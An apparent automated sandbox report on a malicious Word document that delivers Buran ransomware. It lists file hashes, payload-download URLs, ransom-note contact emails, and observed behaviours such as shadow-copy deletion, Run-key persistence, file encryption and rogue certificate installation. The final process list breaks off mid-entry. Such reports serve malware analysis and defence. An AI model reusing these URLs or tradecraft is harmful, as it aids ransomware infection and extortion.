Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-11-2020 11:34
Static task
static1
Behavioral task
behavioral1
Sample
Delivery-77426522.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Delivery-77426522.doc
Resource
win10v20201028
General
-
Target
Delivery-77426522.doc
-
Size
118KB
-
MD5
29584bef6e963b191cb0a900a75585db
-
SHA1
3c298a6f35cfdf61fc271a8cad59ea84b827335f
-
SHA256
0f81f4eb37083c821598ffd57cff12a082f19ca2de57c86faff65755ef332686
-
SHA512
c4084c658ade731ee3dae206b75ec47cb488c21b95963375a9ad8b016585b5f046c1e635fc65c57f271d99f6a0b0804998056e386c774775b5259a0f00ae8350
Malware Config
Extracted
http://vidrioindustrial.com/
http://forcecareer.com/
http://onw.kx1.in/
http://hos365llc.com/
http://testwebsite.taxauctioninvestors.com/
http://shradhajewellers.com/
https://educationmillion.com/
http://geozone.at/
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
kassmaster@danwin1210.me
kassmaster@tutanota.com
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2100 3508 cmd.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 26 3852 powershell.exe -
Executes dropped EXE 5 IoCs
Processes:
Bw99ofg.exe15sp.exemesager43.exesvchost.exesvchost.exepid process 2164 Bw99ofg.exe 980 15sp.exe 3704 mesager43.exe 3692 svchost.exe 1796 svchost.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\FindSuspend.tiff svchost.exe File opened for modification C:\Users\Admin\Pictures\SkipUnblock.tiff svchost.exe -
Processes:
resource yara_rule C:\ssd\onset\mesager43.exe upx C:\ssd\onset\mesager43.exe upx C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe upx C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe upx C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe upx -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
mesager43.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run mesager43.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\svchost.exe\" -start" mesager43.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exedescription ioc process File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\F: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\J: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 30 geoiptool.com -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 24122 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Program Files\7-Zip\Lang\th.txt.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.scale-100.png svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-100.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\ui-strings.js.2BE-C57-121 svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text_2x.png.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\CoreEngine.winmd svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageLargeTile.scale-200.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\ui-strings.js svchost.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\3RDPARTY.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-64.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\selector.js svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019MSDNR_Retail-pl.xrm-ms svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png.2BE-C57-121 svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg.2BE-C57-121 svchost.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF@3x.png svchost.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-100.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_12s.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyoptionaltools.jar svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\jni_md.h.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.png svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark@4x.png svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\Fonts\MsgMDL2.ttf svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js.2BE-C57-121 svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\ui-strings.js svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_OEM_Perp-ul-oob.xrm-ms svchost.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\LargeTile.scale-125.png svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\9.jpg svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MapsSmallTile.scale-100.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\ui-strings.js.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF@3x.png.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupMedTile.scale-200.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\ui-strings.js.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar svchost.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-125_contrast-black.png svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\bandit.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\s_thumbnailview_18.svg.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART1.BDR svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART8.BDR.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\MedTile.scale-100.png svchost.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Microsoft.Xbox.NetworkTroubleshooter.winmd svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul-oob.xrm-ms svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-pl.xrm-ms.2BE-C57-121 svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\ui-strings.js svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-pl.xrm-ms.2BE-C57-121 svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_Subscription-ppd.xrm-ms svchost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsymt.ttf svchost.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\SmallLogo.scale-125.png svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.2BE-C57-121 svchost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js svchost.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 2880 timeout.exe 3468 timeout.exe 3836 timeout.exe 3148 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 1620 vssadmin.exe 2496 vssadmin.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3424 taskkill.exe 3024 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
Bw99ofg.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings Bw99ofg.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe -
Processes:
mesager43.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mesager43.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mesager43.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 644 WINWORD.EXE 644 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 94 IoCs
Processes:
powershell.exemesager43.exetaskkill.exetaskkill.exeWMIC.exeWMIC.exevssvc.exedescription pid process Token: SeDebugPrivilege 3852 powershell.exe Token: SeDebugPrivilege 3704 mesager43.exe Token: SeDebugPrivilege 3704 mesager43.exe Token: SeDebugPrivilege 3424 taskkill.exe Token: SeDebugPrivilege 3024 taskkill.exe Token: SeIncreaseQuotaPrivilege 984 WMIC.exe Token: SeSecurityPrivilege 984 WMIC.exe Token: SeTakeOwnershipPrivilege 984 WMIC.exe Token: SeLoadDriverPrivilege 984 WMIC.exe Token: SeSystemProfilePrivilege 984 WMIC.exe Token: SeSystemtimePrivilege 984 WMIC.exe Token: SeProfSingleProcessPrivilege 984 WMIC.exe Token: SeIncBasePriorityPrivilege 984 WMIC.exe Token: SeCreatePagefilePrivilege 984 WMIC.exe Token: SeBackupPrivilege 984 WMIC.exe Token: SeRestorePrivilege 984 WMIC.exe Token: SeShutdownPrivilege 984 WMIC.exe Token: SeDebugPrivilege 984 WMIC.exe Token: SeSystemEnvironmentPrivilege 984 WMIC.exe Token: SeRemoteShutdownPrivilege 984 WMIC.exe Token: SeUndockPrivilege 984 WMIC.exe Token: SeManageVolumePrivilege 984 WMIC.exe Token: 33 984 WMIC.exe Token: 34 984 WMIC.exe Token: 35 984 WMIC.exe Token: 36 984 WMIC.exe Token: SeIncreaseQuotaPrivilege 2740 WMIC.exe Token: SeSecurityPrivilege 2740 WMIC.exe Token: SeTakeOwnershipPrivilege 2740 WMIC.exe Token: SeLoadDriverPrivilege 2740 WMIC.exe Token: SeSystemProfilePrivilege 2740 WMIC.exe Token: SeSystemtimePrivilege 2740 WMIC.exe Token: SeProfSingleProcessPrivilege 2740 WMIC.exe Token: SeIncBasePriorityPrivilege 2740 WMIC.exe Token: SeCreatePagefilePrivilege 2740 WMIC.exe Token: SeBackupPrivilege 2740 WMIC.exe Token: SeRestorePrivilege 2740 WMIC.exe Token: SeShutdownPrivilege 2740 WMIC.exe Token: SeDebugPrivilege 2740 WMIC.exe Token: SeSystemEnvironmentPrivilege 2740 WMIC.exe Token: SeRemoteShutdownPrivilege 2740 WMIC.exe Token: SeUndockPrivilege 2740 WMIC.exe Token: SeManageVolumePrivilege 2740 WMIC.exe Token: 33 2740 WMIC.exe Token: 34 2740 WMIC.exe Token: 35 2740 WMIC.exe Token: 36 2740 WMIC.exe Token: SeBackupPrivilege 2228 vssvc.exe Token: SeRestorePrivilege 2228 vssvc.exe Token: SeAuditPrivilege 2228 vssvc.exe Token: SeIncreaseQuotaPrivilege 2740 WMIC.exe Token: SeIncreaseQuotaPrivilege 984 WMIC.exe Token: SeSecurityPrivilege 2740 WMIC.exe Token: SeSecurityPrivilege 984 WMIC.exe Token: SeTakeOwnershipPrivilege 2740 WMIC.exe Token: SeLoadDriverPrivilege 2740 WMIC.exe Token: SeTakeOwnershipPrivilege 984 WMIC.exe Token: SeSystemProfilePrivilege 2740 WMIC.exe Token: SeLoadDriverPrivilege 984 WMIC.exe Token: SeSystemtimePrivilege 2740 WMIC.exe Token: SeSystemProfilePrivilege 984 WMIC.exe Token: SeProfSingleProcessPrivilege 2740 WMIC.exe Token: SeSystemtimePrivilege 984 WMIC.exe Token: SeIncBasePriorityPrivilege 2740 WMIC.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE -
Suspicious use of WriteProcessMemory 94 IoCs
Processes:
cmd.exeBw99ofg.exeWScript.execmd.exeWScript.execmd.exemesager43.exesvchost.exedescription pid process target process PID 2100 wrote to memory of 2716 2100 cmd.exe msg.exe PID 2100 wrote to memory of 2716 2100 cmd.exe msg.exe PID 2100 wrote to memory of 3852 2100 cmd.exe powershell.exe PID 2100 wrote to memory of 3852 2100 cmd.exe powershell.exe PID 2164 wrote to memory of 3252 2164 Bw99ofg.exe WScript.exe PID 2164 wrote to memory of 3252 2164 Bw99ofg.exe WScript.exe PID 2164 wrote to memory of 3252 2164 Bw99ofg.exe WScript.exe PID 3252 wrote to memory of 2092 3252 WScript.exe cmd.exe PID 3252 wrote to memory of 2092 3252 WScript.exe cmd.exe PID 3252 wrote to memory of 2092 3252 WScript.exe cmd.exe PID 2092 wrote to memory of 980 2092 cmd.exe 15sp.exe PID 2092 wrote to memory of 980 2092 cmd.exe 15sp.exe PID 2092 wrote to memory of 980 2092 cmd.exe 15sp.exe PID 2092 wrote to memory of 3148 2092 cmd.exe timeout.exe PID 2092 wrote to memory of 3148 2092 cmd.exe timeout.exe PID 2092 wrote to memory of 3148 2092 cmd.exe timeout.exe PID 2092 wrote to memory of 1168 2092 cmd.exe WScript.exe PID 2092 wrote to memory of 1168 2092 cmd.exe WScript.exe PID 2092 wrote to memory of 1168 2092 cmd.exe WScript.exe PID 2092 wrote to memory of 2880 2092 cmd.exe timeout.exe PID 2092 wrote to memory of 2880 2092 cmd.exe timeout.exe PID 2092 wrote to memory of 2880 2092 cmd.exe timeout.exe PID 1168 wrote to memory of 2532 1168 WScript.exe cmd.exe PID 1168 wrote to memory of 2532 1168 WScript.exe cmd.exe PID 1168 wrote to memory of 2532 1168 WScript.exe cmd.exe PID 2532 wrote to memory of 3680 2532 cmd.exe attrib.exe PID 2532 wrote to memory of 3680 2532 cmd.exe attrib.exe PID 2532 wrote to memory of 3680 2532 cmd.exe attrib.exe PID 2532 wrote to memory of 3468 2532 cmd.exe timeout.exe PID 2532 wrote to memory of 3468 2532 cmd.exe timeout.exe PID 2532 wrote to memory of 3468 2532 cmd.exe timeout.exe PID 2532 wrote to memory of 3704 2532 cmd.exe mesager43.exe PID 2532 wrote to memory of 3704 2532 cmd.exe mesager43.exe PID 2532 wrote to memory of 3704 2532 cmd.exe mesager43.exe PID 3704 wrote to memory of 3692 3704 mesager43.exe svchost.exe PID 3704 wrote to memory of 3692 3704 mesager43.exe svchost.exe PID 3704 wrote to memory of 3692 3704 mesager43.exe svchost.exe PID 3704 wrote to memory of 3364 3704 mesager43.exe notepad.exe PID 3704 wrote to memory of 3364 3704 mesager43.exe notepad.exe PID 3704 wrote to memory of 3364 3704 mesager43.exe notepad.exe PID 3704 wrote to memory of 3364 3704 mesager43.exe notepad.exe PID 3704 wrote to memory of 3364 3704 mesager43.exe notepad.exe PID 3704 wrote to memory of 3364 3704 mesager43.exe notepad.exe PID 2532 wrote to memory of 3424 2532 cmd.exe taskkill.exe PID 2532 wrote to memory of 3424 2532 cmd.exe taskkill.exe PID 2532 wrote to memory of 3424 2532 cmd.exe taskkill.exe PID 2532 wrote to memory of 3024 2532 cmd.exe taskkill.exe PID 2532 wrote to memory of 3024 2532 cmd.exe taskkill.exe PID 2532 wrote to memory of 3024 2532 cmd.exe taskkill.exe PID 2532 wrote to memory of 2172 2532 cmd.exe attrib.exe PID 2532 wrote to memory of 2172 2532 cmd.exe attrib.exe PID 2532 wrote to memory of 2172 2532 cmd.exe attrib.exe PID 2532 wrote to memory of 3836 2532 cmd.exe timeout.exe PID 2532 wrote to memory of 3836 2532 cmd.exe timeout.exe PID 2532 wrote to memory of 3836 2532 cmd.exe timeout.exe PID 3692 wrote to memory of 3992 3692 svchost.exe cmd.exe PID 3692 wrote to memory of 3992 3692 svchost.exe cmd.exe PID 3692 wrote to memory of 3992 3692 svchost.exe cmd.exe PID 3692 wrote to memory of 2304 3692 svchost.exe cmd.exe PID 3692 wrote to memory of 2304 3692 svchost.exe cmd.exe PID 3692 wrote to memory of 2304 3692 svchost.exe cmd.exe PID 3692 wrote to memory of 3780 3692 svchost.exe cmd.exe PID 3692 wrote to memory of 3780 3692 svchost.exe cmd.exe PID 3692 wrote to memory of 3780 3692 svchost.exe cmd.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 3680 attrib.exe 2172 attrib.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Delivery-77426522.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
